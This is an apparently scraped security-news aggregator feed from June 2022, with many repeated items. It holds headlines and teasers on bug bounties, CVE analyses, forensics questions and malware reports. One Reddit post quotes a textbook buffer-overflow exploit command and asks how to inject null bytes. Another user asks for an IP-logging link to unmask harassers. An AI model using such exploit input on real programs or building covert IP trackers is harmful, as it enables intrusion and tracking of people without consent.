    submitted by /u/woja111 [link] [comments]
  • Open

    SecWiki News 2022-06-21 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-21 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Infosec Weekly #2 — Docker, Google Dorks, Bug Bounty and other interesting Infosec stuff.
    No content preview
    What are supply chains and how to secure them
    What are Supply Chains Attacks Continue reading on InfoSec Write-ups »
    Telangana, Andhra Pradesh, Karnataka, Himachal Pradesh & Kerala — All Government bus services were…
    No content preview
    HacktheBox Writeup: Paper
    No content preview
    Kubernetes Security Policy Enforcement — OPA
    No content preview
    Google Dorks: An Advanced Hacking Tool
    No content preview
    Create a Hidden IRC Server with The Onion Router (TOR)
    No content preview
  • Open

    Infosec Weekly #2 — Docker, Google Dorks, Bug Bounty and other interesting Infosec stuff.
    No content preview
    What are supply chains and how to secure them
    What are Supply Chains Attacks Continue reading on InfoSec Write-ups »
    Telangana, Andhra Pradesh, Karnataka, Himachal Pradesh & Kerala — All Government bus services were…
    No content preview
    HacktheBox Writeup: Paper
    No content preview
    Kubernetes Security Policy Enforcement — OPA
    No content preview
    Google Dorks: An Advanced Hacking Tool
    No content preview
    Create a Hidden IRC Server with The Onion Router (TOR)
    No content preview
  • Open

    Infosec Weekly #2 — Docker, Google Dorks, Bug Bounty and other interesting Infosec stuff.
    No content preview
    What are supply chains and how to secure them
    What are Supply Chains Attacks Continue reading on InfoSec Write-ups »
    Telangana, Andhra Pradesh, Karnataka, Himachal Pradesh & Kerala — All Government bus services were…
    No content preview
    HacktheBox Writeup: Paper
    No content preview
    Kubernetes Security Policy Enforcement — OPA
    No content preview
    Google Dorks: An Advanced Hacking Tool
    No content preview
    Create a Hidden IRC Server with The Onion Router (TOR)
    No content preview
  • Open

    记一次实战攻防(打点-Edr-内网-横向-Vcenter)
    前不久参加了一场攻防演练,过程既简单也曲折,最后通过横向渗透获取到了vcenter管理控制台权限,成功拿下本次演练目标。
    顺德农商银行2021年金融科技人才社会招聘全面启动~~
    诚邀您共同书写顺德农商银行的数字未来!!
    FreeBuf早报 | 亚马逊前员工因数据泄露被定罪;谷歌浏览器扩展可用于在线跟踪用户
    亚马逊前员工因数据泄露被定罪。
    可怕!美国旗星银行150万客户数据遭泄露
    旗星银行(Flagstar Bank)150多万名客户在去年12月的一次网络攻击中,个人数据遭到了黑客的访问。
    可怕!!美国旗星银行150万客户数据遭泄露
    旗星银行(Flagstar Bank)150多万名客户在去年12月的一次网络攻击中,个人数据遭到了黑客的访问。
    微软紧急发布更新,修复ARM设备上的Microsoft365登录问题
    近期Microsoft发布了一个带外(OOB)Windows更新。
    APT 28组织成员被指控入侵北约智库
    一名黑客被指控对位于德国的北约智库联合空中力量能力中心进行了网络间谍攻击。
  • Open

    The complete bitdl.ir List
    http://s1.bitdl.ir/ - Works http://s2.bitdl.ir/ - Works http://s3.bitdl.ir/ - Works http://s4.bitdl.ir/ - Offline http://s5.bitdl.ir/ - Offline http://s6.bitdl.ir/ - 403 Error http://s7.bitdl.ir/ - Offline http://s8.bitdl.ir/ - 403 Error http://s9.bitdl.ir/ - Works http://s10.bitdl.ir/ - Works http://s11.bitdl.ir/ - Offline http://s12.bitdl.ir/ - Offline http://s13.bitdl.ir/ - Works http://s14.bitdl.ir/ - Works http://s15.bitdl.ir/ - Offline http://s16.bitdl.ir/ - DNS Resolution Error http://s17.bitdl.ir/ - Offline http://s18.bitdl.ir/ - Offline http://s19.bitdl.ir/ - 403 Error http://s20.bitdl.ir/ - Offline http://s21.bitdl.ir/ - Offline http://s22.bitdl.ir/ - Offline http://s23.bitdl.ir/ - Offline http://s24.bitdl.ir/ - Offline http://s25.bitdl.ir/ - Offline http://s26.bitdl.ir/ - Offline http://s27.bitdl.ir/ - 403 Error http://s28.bitdl.ir/ - Works http://s29.bitdl.ir/ - Offline http://s30.bitdl.ir/ - 403 Error http://s31.bitdl.ir/ - Offline http://s32.bitdl.ir/ - 403 Error http://s33.bitdl.ir/ - Offline submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Find out formated or marged partitions
    Hello all, I have a laptop ssd drive with windows, I took the drive created E01 file, decrypt it from bittlocker encryption and i want to know the history of the partitions, I tried to use volume shadow copies but they all very recent, how can I tell if the partitions changed somehow? thanks in advance. submitted by /u/tzichntzch [link] [comments]
    Convert Parallels image
    Hey Guys maybe someone of you can help me. Im investigating an image of an older MacBook. There is an Win10 Parallels-VM inside. Is it possible to extract an image of this VM? In best case direct as .e01? I don't have a Mac by myselve so i can't use parallels to convert the VM. The only way I discovered some evidence is by carving.. submitted by /u/kaibring [link] [comments]
    $8k tower budget
    Company recently gave me a 15k budget, 8k specific to a new PC. Does anyone have any recents forensic tower builds for under 8k used to process cell dumps and run analytics or custom build companies you recommend? Found a Dell Precision 7910 xeon e5 2698 v4 2.2 ghz, 20 core, 512 GB ddr4 that's under 6k but not excited about xeon. Looking for options and new accessories to build out the 15k. submitted by /u/WhoAteTheLastCookie [link] [comments]
  • Open

    What is Fuzzing? Why it is Important on Cybersecurity?
    What is Fuzzing? Why it is Important on Cybersecurity? Continue reading on Medium »
  • Open

    What is Fuzzing? Why it is Important on Cybersecurity?
    What is Fuzzing? Why it is Important on Cybersecurity? Continue reading on Medium »
  • Open

    CVE-2022-1040 Sophos Firewall 服务架构与认证绕过漏洞分析之旅
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/c0X8Ct2I2SP-H_pioMM12Q 漏洞信息 前端时间 Sophos Firewall 爆出了一个认证绕过漏洞 CVE-2022-1040 ,最近在深入分析 Sophos 服务架构的同时,完整复现了该漏洞。主要是在 User Portal 及 Webadmin 两个接口存在认证绕过漏洞,漏洞巧妙利用了...
    CVE-2022-27925 Zimbra Collaboration 存在路径穿越漏洞最终导致RCE
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/2pUW4H1v6mnXtMqTlxZCMA 漏洞信息 前段时间 Zimbra 官方通报了一个 RCE 漏洞 CVE-2022-27925 ,也有小伙伴在漏洞空间站谈到了这个漏洞,上周末在家有时间完成了漏洞的分析与复现。漏洞原理并不复杂,但在搭建环境的过程中遇到了一些坑,下面将分析过程分享给大家。 从描述来看,...
    WebLogic CVE-2021-2294 反序列化 JDBC 漏洞分析
    作者:thiscodecc@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/lUAkk9iI1yUBjy4l1eFYpg 漏洞简述 2021年1月12日,墨云安全V-Lab实验室向Oracle官方报告了Weblogic Server 反序列化JDBC漏洞,2021年4月21日Oracle发布了致谢信息。 2019年11月底Yang Zhang等人在...
  • Open

    CVE-2022-1040 Sophos Firewall 服务架构与认证绕过漏洞分析之旅
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/c0X8Ct2I2SP-H_pioMM12Q 漏洞信息 前端时间 Sophos Firewall 爆出了一个认证绕过漏洞 CVE-2022-1040 ,最近在深入分析 Sophos 服务架构的同时,完整复现了该漏洞。主要是在 User Portal 及 Webadmin 两个接口存在认证绕过漏洞,漏洞巧妙利用了...
    CVE-2022-27925 Zimbra Collaboration 存在路径穿越漏洞最终导致RCE
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/2pUW4H1v6mnXtMqTlxZCMA 漏洞信息 前段时间 Zimbra 官方通报了一个 RCE 漏洞 CVE-2022-27925 ,也有小伙伴在漏洞空间站谈到了这个漏洞,上周末在家有时间完成了漏洞的分析与复现。漏洞原理并不复杂,但在搭建环境的过程中遇到了一些坑,下面将分析过程分享给大家。 从描述来看,...
    WebLogic CVE-2021-2294 反序列化 JDBC 漏洞分析
    作者:thiscodecc@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/lUAkk9iI1yUBjy4l1eFYpg 漏洞简述 2021年1月12日,墨云安全V-Lab实验室向Oracle官方报告了Weblogic Server 反序列化JDBC漏洞,2021年4月21日Oracle发布了致谢信息。 2019年11月底Yang Zhang等人在...
  • Open

    Kryptos Support Write-up
    Hack The Box Cyber Apocalypse 2022 Continue reading on Medium »

  • Open

    Is it possible to get loader/dropper malware on iPhone?
    Specifically from the Apple App Store- can programs come packed with or download secondary malicious apps that are invisible to the user? Or is this impossible given the file system of the iPhone? submitted by /u/machine_funk [link] [comments]
    Is there any way to only present OTP when client side properties (IP address/useragent) changes
    Hey, While one idea was to have a list of trusted locations (public IP address) and trusted devices (user agent) and if the public ip address or devices associated with the username changed on the /login or /reset-password the user would be presented with an SMS OTP code forum. Why? Many of the web application users are seniors or technically inept users and management wants to lower the number of OTP codes being presented to the users (please note that the devices accessing these applications are stationary PCs) Any other way you'd go about doing this? Anything that can be unique for each client that can be gathered using JS? submitted by /u/RubaLion07 [link] [comments]
    hey guys hope you can help me with my CV
    this is my resume hope you can help me and tell me what I'm missing, i keep applying to jobs but no answer,btw I'm taking my OSCP exam next week https://www.velvetjobs.com/resume/spkheh/ahmed-tahah submitted by /u/J0r3n3y [link] [comments]
    How to safe share password and other sensitive information in the company?
    What ways do you know how to share sensitive information? For example to share a password to an FTP or API doc, or a private link, etc. I know this resource: https://onetimesecret.com/, but I'm not sure if it safe. submitted by /u/athanielx [link] [comments]
    Looking for a book/course about gathering threat Intel
    I’ve come across many books in my search about the concept of threat Intel and how to use it. I’m currently looking for a book or course about how to gather threat intelligence data from the clear web and dark web Are there any recommendations? Thank you, submitted by /u/DoubleAgent10 [link] [comments]
    what skills to focus on for top dollar
    What niche or skills are most in demand that business are paying top dollar for. I dont want to be ok at everything as ive heard thats not good but should be an expert in a niche. I am taking sec+ test in a few days and would like to know what skills i should get next in order to be job ready. submitted by /u/Mufakinyanyo [link] [comments]
  • Open

    Hacking into the worldwide Jacuzzi SmartTub network
    submitted by /u/EatonZ [link] [comments]
    Zero Trust - A Layered Approach against threats
    submitted by /u/J_0_5 [link] [comments]
    semgrep rule pack by elttam - Java entry-points and security issues in Jackson, Spring Remoting, and Struts DMI
    submitted by /u/Gallus [link] [comments]
    Linux Threat Hunting: 'Syslogk' a kernel rootkit found under development in the wild
    submitted by /u/nykzhang [link] [comments]
  • Open

    Mix Content
    https://www.midian.appboxes.co/APPS1/ https://lockdown.madhouse.appboxes.co/Software/ https://lmao.lolxd.workers.dev/0:/ ​ Not sure if it has any NSFW content. submitted by /u/tempoguyx [link] [comments]
    Some audiobooks- there's a gud section on Terry Pratchett. I searched using "site:reddit.com/r/opendirectories/ drunkresearch" and got nothing so looks NEW!
    submitted by /u/ringofyre [link] [comments]
    text to speech audiobooks
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    War in Ukraine / June 17–19
    To capture Luhansk region till June 26 Continue reading on Medium »
    How to use GIS for Machine Learning
    In our 2 previous amazing articles : Continue reading on Preligens Stories »
    OSINT DOJO- Geolocation Challenge! 20 Jun 2022
    Usually the first thing I would do as a low hanging fruit is to just run the image through Tineye, Yandex and Google Image Search. Nothing… Continue reading on Medium »
  • Open

    SecWiki News 2022-06-20 Review
    SecWiki周刊(第433期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-20 Review
    SecWiki周刊(第433期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Authentication CSRF resulting in unauthorized account access on Krisp app
    Krisp disclosed a bug submitted by yassineaboukir: https://hackerone.com/reports/1267476 - Bounty: $1000
    Add more seats by paying less via PUT /v2/seats request manipulation
    Krisp disclosed a bug submitted by life__001: https://hackerone.com/reports/1446090 - Bounty: $500
    Admin Authentication Bypass Lead to Admin Account Takeover
    UPS VDP disclosed a bug submitted by 7odamo: https://hackerone.com/reports/1490470
  • Open

    Magnet axiom process error message
    Hi, I have come across this error message (process error - axiom process encountered an error while decrypting the evidence source) in magnet axiom process and can’t find anything that tells what’s wrong. This one occurs on the last step when I attempt to start and analyse the E01 file. I have also started process with the same E01 file with an another computer with less good hardware and that one doesn’t get the error message and starts the process but gets stuck at 40% (when it analyses files and folders) Bitlocker key I’m using is also correct, tested to unlock it multiple times. Is there any clue on what this error message means and why it occurs? To add more, in the ftk imager just saw I got this message: ATTENTION: The following sector(s) on the source drive could not be read: The contents of these sectors were replaced with zeros in the image. I have done three ftk imager now and both end up the same. submitted by /u/Gackie [link] [comments]
    Booting a image from OSFClone
    Hi all, I have made an image of a system with OSFClone. This generated a file with no file extension. Now I want to boot a copy of the system in vmware workstation but it does only accept .raw or .dd files. I can view the file in Autopsy. Does anyone know how to boot this image file? Tanks in advance! submitted by /u/ProAdmin007 [link] [comments]
  • Open

    Every XSS is different
    Today I’m going to talk about an XSS that I found on a public bugbounty program about a year ago, this program has multiple websites and… Continue reading on Medium »
    The mistakes of a novice
    Who is Soheil vanaee? Continue reading on Medium »
    How I found 5 CVEs in few days
    Hi all, Continue reading on Medium »
    Response Manipulation in the Admin panel lead to PII leakage
    Hi there, 7odamo is here. Today I will talk about How I was able to view all the customer reports on UPS Admin Panel Continue reading on System Weakness »
    Response Manipulation in the Admin panel lead to PII leakage
    Hi there, 7odamo is here. Today I will talk about How I was able to view all the customer reports on UPS Admin Panel Continue reading on Medium »
  • Open

    Finding client-side prototype pollution with DOM Invader
    Last year we made it significantly easier to find DOM XSS, when we introduced a brand new tool called DOM Invader. This year, we've improved DOM Invader to make finding CSPP (client-side prototype pol
  • Open

    Finding client-side prototype pollution with DOM Invader
    Last year we made it significantly easier to find DOM XSS, when we introduced a brand new tool called DOM Invader. This year, we've improved DOM Invader to make finding CSPP (client-side prototype pol
  • Open

    FreeBuf早报 | 美当局称已捣毁僵尸网络RSOCKS;去中心化金融遭网络犯罪重创
    美国当局与德国、荷兰和英国的执法机构合作,成功拆除了与俄罗斯僵尸网络RSOCKS有关的基础设施。
    Google发布《SOC建设指南》,对未来SOC提出新思考
    Google从SOC转型的意义、自动化安全运营的定义,以及实现自动化安全的运营的具体方法探讨未来自动化SOC的建设方向。
    美国司法部成功打掉了 RSocks 僵尸网络
    该僵尸网络在受害者不知情的状况下,入侵和劫持全球数百万台计算机、智能手机和物联网设备,用作代理服务器。
    使用西门子工控系统的注意了,已经暴露了15个安全漏洞
    西门子 SINEC 网络管理系统 (NMS) 中存在 15 个安全漏洞,可能被攻击者混合使用,以在受影响的系统上实现远程代码执行。
    DeadBolt 勒索软件再次发难,威联通正展开调查
    QNAP近期检测到新的DeadBolt勒索软件活动,根据目前受害者的报告,该攻击活动似乎针对运行QTS 4.x系统版本的NAS设备。

  • Open

    Account Takeover by OTP bypass
    Hey everyone! This bypass is little bit interesting and you will get to learn a lot hopefully. Continue reading on Medium »
    SQLI-Real-Victim
    Hello guys, in this tutorial I have real victim in my article, and I do not really want to censor it because they act like an idiot people… Continue reading on Medium »
    How I found my first Bug using my android phone
    Hello there!! Continue reading on Medium »
    Bug Bounty Tips
    Oke disini saya akan berbagi pengalaman tips yang mungkin cukup berguna bagi bug hunter, sebelumnya saya akan menjelaskan apa itu postman. Continue reading on Medium »
    How an broken link got me over €250
    Hey! This is Prath. I’m here to tell you about an old finding I made, in which I found an broken link. Continue reading on Medium »
  • Open

    On-demand / online introductory courses / certifications in IT-Forensics ~ $500 USD?
    Hello, Just to be clear, I've read the FAQ here about "Which forensics certifications should I get?". I am (surprise surprise) a EU-citizen so looking for on-demand / online training course which is a prep. for a certificate in IT-Forensics encompassing the basics pref. without being geared towards a specific vendor (EnCase etc.). I am paying this out of pocket so IACIS and SANS / GIAC certificates are too expensive, I was thinking about around $500 USD or around that for both a: * Online / on-demand course which would cover the exam * Including an exam voucher The ONLY alternative I've found is the EC-Council Digital Forensics Essentials which for $199 covers an on-demand course and gives one attempt for the certification; EC-Council Computer Forensics Investigation Training | EC-Council iClass (eccouncil.org) now what I've read about CEH and CHFI aren't exactly stellar and peoples experience with EC-Council as a whole doesn't seem to be that as well (go figure). Does anyone have any other suggestions? I've already taken Network+, Security+ and thinking about taking the A+ just to have the CompTIA trifecta, other then that I have various Azure and AWS certificates. Other then A+ I was thinking about delving into Python which seems both interesting and also worthwhile in the DFIR / IT-Forensics field. Linux+ from CompTIA is also on the roadmap. Thank you for your time and suggestions! submitted by /u/TheSwede86 [link] [comments]
    SANS FOR508 on Linux
    Hi all, Soon attending FOR508 and have an unanswered question. Prerequisites for the course states Virtualization software on Windows/MacOS - anyone know any reason why it shouldn’t be ok to run it on top of Linux? submitted by /u/redditsecguy [link] [comments]
    any websites to track ips or view them when they click on the link?
    I'm looking for kind of a troll website that people can click on and get their ip address visit registered whenever they do it so i can see them,the reason is because i'm being harrased by My ex boyfriend and his girlfriend and i have no way to prove it and i know a website that gives me the address with the ip but not the ip itself,or if i could pay one of you guys to make that website for me if it is possible and how much would that cost and show me of course a few of your previous work ID kindly apprecciate it if you educate me a little bit on this topic. Thank you, Best regards. submitted by /u/Proper-Ad-1944 [link] [comments]
  • Open

    SecWiki News 2022-06-19 Review
    静态分析及代码审计自动化相关资料收集 by ourren Pwn思维导图 by ourren CodeQL 数据库创建原理分析 by ourren 我的前端学习路线 by ourren 一篇论文如何摧毁比特币的匿名性 by ourren 对安全网闸产品初探 by ourren 我的知识管理方式 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-19 Review
    静态分析及代码审计自动化相关资料收集 by ourren Pwn思维导图 by ourren CodeQL 数据库创建原理分析 by ourren 我的前端学习路线 by ourren 一篇论文如何摧毁比特币的匿名性 by ourren 对安全网闸产品初探 by ourren 我的知识管理方式 by ourren 更多最新文章,请访问SecWiki
  • Open

    LDAP in Active Directory
    No content preview
  • Open

    LDAP in Active Directory
    No content preview
  • Open

    LDAP in Active Directory
    No content preview
  • Open

    Liste, elenchi, serie e altri oggetti pericolosi
    Una settimana fa, dopo qualche ripensamento, mi sono convinto ad affrontare — sul canale YouTube di Intelli|sfèra — la questione della… Continue reading on Medium »
    SPY NEWS: 2022 — Week 24
    Summary of the espionage-related news stories for the Week 24 (12–18 June) of 2022. Continue reading on Medium »
  • Open

    Authentication token and CSRF token bypass
    Enjin disclosed a bug submitted by whiteshadow201: https://hackerone.com/reports/998457 - Bounty: $300
    bypass forced password protection via circles app
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/1406926 - Bounty: $100
  • Open

    New blog - NMAP and CME 101 stuff
    submitted by /u/Mr-R3b00t [link] [comments]
  • Open

    NSFW Pics few folders, few pics each.
    small OD, Big Tits. https://bustygrls.com/pics/images/ BlakeLively Canucks Halloween KimKardashian LindsayLohan Masturbation NickiMinaj Rihanna RitaOra ScarlettJohansson Winter babes blowjobs booty celebs cleavage emo milf pro pussy titties tittyfuck voluptuous xmas ​ JPG's Total wall clock time: 1m 13s Downloaded: 696 files, 36M in 5.6s (6.45 MB/s) submitted by /u/thats_dumberst [link] [comments]
  • Open

    FreeBuf早报 | 前亚马逊工程师曾盗窃1亿人数据;八成互联网电视非法采集用户数据
    前亚马逊软件工程师 Paige Thompson 被指控在 2019 年从 Capital One 窃取数据,可因电信欺诈被判处最高20年监禁。
  • Open

    Is there an easy way to tell which Cisco devices can have smartinstall service?
    I’m teaching a class, and thought about buying a Cisco device to demonstrate how to exploit the smartinstall service to get the hashes and crack them. But of course I’d buy old used on eBay. But no idea which devices SI can run on. Thanks submitted by /u/networkalchemy [link] [comments]

  • Open

    LoveTok — HackTheBox — Web Exploitation — Challenge — Writeup
    Hello guys I am back to posting another writeup. This is a web challenge. The challenge was created on 13th February 2021. It is a… Continue reading on Medium »
    Lesser Known Web Attacks: Server Side Injection
    Introduction Continue reading on Medium »
    OAuth Misconfiguration Leads To Pre-Account Takeover
    Hello, Continue reading on Medium »
    How I hacked one of the biggest Airline in the world
    Hello Bug Bounty community, this is my first write up about a bug that I managed to takeover all accounts in one of well known Airline in… Continue reading on Medium »
    My First Bug- Account Takeover
    Hi Amazing People, Hope you are all doing well. This is my very first article on my first ever bug that I found. So in case if you find… Continue reading on Medium »
    AlbusSec:- Penetration-List 011 API Vulnerabilities  — Sample
    Hi Information Security folk, I hope you liked my previous article that was on Cross-Origin-Resource-Sharing(CORS) Misconfiguration… Continue reading on Medium »
    How I found a No Rate Limit bug
    Hello everyone, Continue reading on Medium »
  • Open

    I made a website can detect over 1000 extensions and shows you the percentage of users that share the same extensions.
    submitted by /u/z0ccc_z0ccc [link] [comments]
    Dangerous Repository of DoS, Red Teaming TTPs, and ICS Exploits
    submitted by /u/entropydaemon6 [link] [comments]
    Scheduled Scaling Up & Down Of EC2 Server
    submitted by /u/ajaidanial [link] [comments]
    I have created a burp suite extension which allows pentester to keep track of each APIs, write test cases for individual APIs. Lastly the extension allows to map the vulnerable apis to the list of vulnerabilities using a custom checklist.
    submitted by /u/Ano_F [link] [comments]
  • Open

    Clair – Vulnerability Static Analysis for Containers
    Article URL: https://github.com/quay/clair Comments URL: https://news.ycombinator.com/item?id=31793991 Points: 8 # Comments: 0
  • Open

    OSINTGRAM — Extrair dados do perfil do Instagram
    OSINTGRAM é uma ferramenta desenvolvida em python3 que permite de forma prática extrair diversos dados de um perfil público do instagram… Continue reading on 100security »
    Life of a Minion
    If we look cautiously enough our social media has already been flooded with sock puppets, swaying our thoughts about a particular topic in… Continue reading on Medium »
    Instaloader — Instagram On Your Terminal
    Have you ever wanted to stop using Instagram, but couldn't because you will be missing your “friends” posts and stories. Use INSTALOADER. Continue reading on Medium »
  • Open

    I clicked on a phising link in my android phone and redirected to 404 not found. Is my information at risk?
    So I got this link in a text message, saying there's been an attempt to log into my amazon account from another country, and I needed to verify my account. I became rather scared and clicked on the link, but it led to a 404 not found page. Then I realized it was a scam and closed the site. I ran an antivirus scan and found nothing. From what I read on the internet, my understanding is that unless I give my personal info or install another app following the phising link, I should be okay. Because my device can't be harmed just by clicking on a link because android apps are sandboxed and one app can't get info from another app. However, what I don't understand is, why would scammers put a 404 not found page if they want any information? Does it not beat the purpose? How can anyone enter info in a dead page? Apparently microsoft already warned about this type of 404 not found phising links. Is it the case that it is a custom 404 page that's not supposed to look dead? My my page looked very dead. I'm rather confused. submitted by /u/Lame_Buddha [link] [comments]
  • Open

    Broken access control
    UPS VDP disclosed a bug submitted by nayefhamouda: https://hackerone.com/reports/1539426
  • Open

    SecWiki News 2022-06-18 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-18 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    X (2022) — Movie Review
    X (2022) is a slasher horror thriller from Ti West and is set in the late 1970s Texas where an adult film crew decides to take up the… Continue reading on Medium »
  • Open

    关于BIS的《信息安全控制:网络安全条目》的解读及影响分析
    本文主要是对美国商务部工业和安全局(BIS)于2022年5月26日发布的《Information Securi … 继续阅读关于BIS的《信息安全控制:网络安全条目》的解读及影响分析 →
  • Open

    Handling null bytes for buffer overflows
    Hello, I am reading the book Hacking: The Are of Explioitation and trying to perfrom a buffer overflow. The command that is used reader@hacking:~/booksrc $ ./auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10') But on my machine I have a null byte (\x00\x00\x07\xe1) therefore it does not handle well this and ommits my null bytes. I tried using piping , even trying to play with the source code of shell but it does not work .. do you might have any ideas how can I overcome this issue? ​ When doing printf "\xe1\x07\x00\x00: | hd I am managing to piping the null byte.. (without command substitution I am managing to piping the null bytes.. thinking somehow to use this way. Edited: It also works when writing into file, I do see the null bytes when ding: hd < args But the stdin is not redirected :( When dping ./myExe < args it still sees < as an argument (so doing certain manipulations with gdb that I saw on the internet i.e https://stackoverflow.com/questions/2953658/gdb-trouble-with-stdin-redirection?fbclid=IwAR16ic5ia0811JN18Dp0Aex7juTkT_KuX_g9A0huhwzZsdE4__myUJm5sUI) submitted by /u/MrsSergeivna [link] [comments]
  • Open

    Giving Red Team Ops certs to women and LGBTQIA+ for Pride Month!
    submitted by /u/VVX7 [link] [comments]

  • Open

    CSRF leads to account takeover in Yahoo!
    submitted by /u/vinay737 [link] [comments]
    Analyzing the latest version of Matanbuchus
    submitted by /u/OwnPreparation3424 [link] [comments]
    Securing OT Network Management Systems: Siemens SINEC NMS
    submitted by /u/derp6996 [link] [comments]
    AWS Lambda Command Injection
    submitted by /u/lormayna [link] [comments]
    BRATA is evolving into an APT | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
  • Open

    【安全通报】Cisco 多款 Small Business 路由器远程代码执...
    近日,Cisco 发布安全通告,修复了多款小型企业路由器的多个漏洞。Cisco Small Business RV110W、RV130、RV130W和RV215W路由器基于web的管理界面中存在漏洞,使...
  • Open

    【安全通报】Cisco 多款 Small Business 路由器远程代码执...
    近日,Cisco 发布安全通告,修复了多款小型企业路由器的多个漏洞。Cisco Small Business RV110W、RV130、RV130W和RV215W路由器基于web的管理界面中存在漏洞,使...
  • Open

    甲方群里疯传的2022攻防演练实践指南,我们终于拿到了!
    指南在手,高分我有!
    甲方群里疯传的2022攻防演练实践指南,我们终于拿到了!
    指南在手,高分我有!
    CVE-2021-31760 Webmin 跨站请求伪造漏洞
    CSRF直接能够点击上线的一个典型案例。
    内网渗透 | 正向代理与nginx配置反向代理详解
    之前一直不太了解nginx是如何实现反向代理的,这里总结一下。
    MetaMask 浏览器扩展钱包 demonic 漏洞分析
    如果你需要协助检测 demonic vulnerability,请联系慢雾安全团队。
    未打补丁的Microsoft Exchange服务器正受勒索软件BlackCat的攻击
    微软发出了一则警告,称“黑猫”勒索软件(BlackCat)正利用未打补丁的Exchange服务器漏洞来获取对目标网络的访问权限。
    一文掌握软件安全必备技术 SAST
    静态应用程序安全测试,也称为静态分析,它通过直接查看应用程序的源代码发现各种安全漏洞,以避免企业损失。
    FreeBuf周报 | 乌克兰将重要数据迁移北约邻国;美举行2022年度网络盾牌演习
    美国举行2022年度“网络盾牌”演习。
    研究员发现恶意软件IceXLoader 3.0新版本,使用Nim语言开发
    研究人员近日发现 IceXLoader 的最新 3.0 版本是使用 Nim 语言开发的,这种语言在过去两年中被攻击者尝试应用在攻击中。
    新型Loader BumbleBee攻击增加,被勒索团伙利用
    研究人员发现近期 BumbleBee 的活跃,服务器数量显著增加,并且发现了多个版本的更新与改进。
    攻防演练中如何避免浏览器成为攻击方“入口” | FreeBuf甲方群话题讨论
    大家最关注的浏览器相关安全需求是什么?有没有什么方法平衡浏览器的安全性、易用性和兼容性?
    “暗象”组织:潜藏十年的网络攻击
    “暗象”组织的主要攻击手段是使用谷歌/雅虎邮箱或者利用盗取的邮箱,向对方发送极具迷惑性的鱼叉邮件。
    因盗取裸体照片,iCloud黑客被判9年监禁
    一名男子承认入侵了数千个 Apple iCloud 帐户,窃取了大量受害者裸体照片和视频。
    存储桶上传策略和签名 URL的绕过及利用
    本文中带有自己一些拙见,读者若存在相关问题或者有其他想法的,欢迎在评论区交流探讨。
    威胁行为者利用企业滥用微软Office 365某功能,对企业发起勒索攻击
    威胁行为者可能会劫持Office 365账户,对存储在SharePoint和OneDrive服务中的文件进行加密,以获得赎金。
  • Open

    Hacking a NFT Marketplace
    Background: Continue reading on Medium »
    CRLF injection scanner
    The most powerful CRLF injection (HTTP Response Splitting) scanner. CRLFsuite — CRLF injection scanner Continue reading on Medium »
    Fuzzing With Custom Wordlists
    Hello Hackers Continue reading on Medium »
  • Open

    Automating Cobalt Strike with Python
    TL;DR I have expanded the payload_automation Python libraries to allow for synchronously controlling actions in a Cobalt Strike Beacon by adding the Beacon class. This enables you to script out Cobalt Strike actions purely in Python and avoid coding anything in Sleep completely (at least for things I’ve already implemented).  One important fact to take note of is that the actions happen synchronously. Those who have worked in Sleep/Aggressor know that it’s a fire and forget language in most cases, so waiting until an action is completed or adding logic based on the results of an action is notoriously difficult to accomplish. With this library, we can synchronize the actions and in most cases, easily capture the output of a specific action in Python and perform actions based on that output…
  • Open

    sql injection via https://setup.p2p.ihost.com/
    IBM disclosed a bug submitted by exploitmsf: https://hackerone.com/reports/1567516
    CSRF Bypassed on Logout Endpoint
    Enjin disclosed a bug submitted by er_salil: https://hackerone.com/reports/1091403
    Race condition via project team member invitation system.
    Enjin disclosed a bug submitted by akashhamal0x01: https://hackerone.com/reports/1108291 - Bounty: $60
  • Open

    War in Ukraine / June 16
    Ukraine can get the status of a candidate for EU membership in a week Continue reading on Medium »
    Van kantoorklerk naar burgerjournalist: dit is het verhaal van Bellingcat
    Hoewel de meeste mensen sociale media vooral gebruiken voor vermaak en het onderhouden van contacten, gebruikt Eliot Higgins ze voor heel… Continue reading on Journalistiek Ede Kijk-luister-leeslijst »
    OhSINT — TryHackMe WriteUp
    Open Source Intelligence (OSINT) is a sub-type of threat intelligence that is only gathered from free, public sources. Continue reading on Medium »
  • Open

    Vulnerabilities in JS based Applications
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Vulnerabilities in JS based Applications
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Vulnerabilities in JS based Applications
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-06-17 Review
    VED (Vault Exploit Defense): 开源实现 by ourren 我和SRC的故事 by ourren “暗象”组织:潜藏十年的网络攻击 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-17 Review
    VED (Vault Exploit Defense): 开源实现 by ourren 我和SRC的故事 by ourren “暗象”组织:潜藏十年的网络攻击 by ourren 更多最新文章,请访问SecWiki
  • Open

    Reddit patches CSRF vulnerability that forced users to view NSFW content
    Article URL: https://portswigger.net/daily-swig/reddit-patches-csrf-vulnerability-that-forced-users-to-view-nsfw-content Comments URL: https://news.ycombinator.com/item?id=31779704 Points: 3 # Comments: 0
  • Open

    How to forensics copy Google Drive?
    Hello everyone! Excluding UFED and Magnet Axiom, there are any other software to provide a forensics acquisition of a Google Account/Google Drive? submitted by /u/Zipper_Ita [link] [comments]
    Dept just added a computer liaison program to our ranks. They are to assist with the Computer Crime Task Force. What trainings, certifications or programs can be recommended in taking outside of vendor specific training?
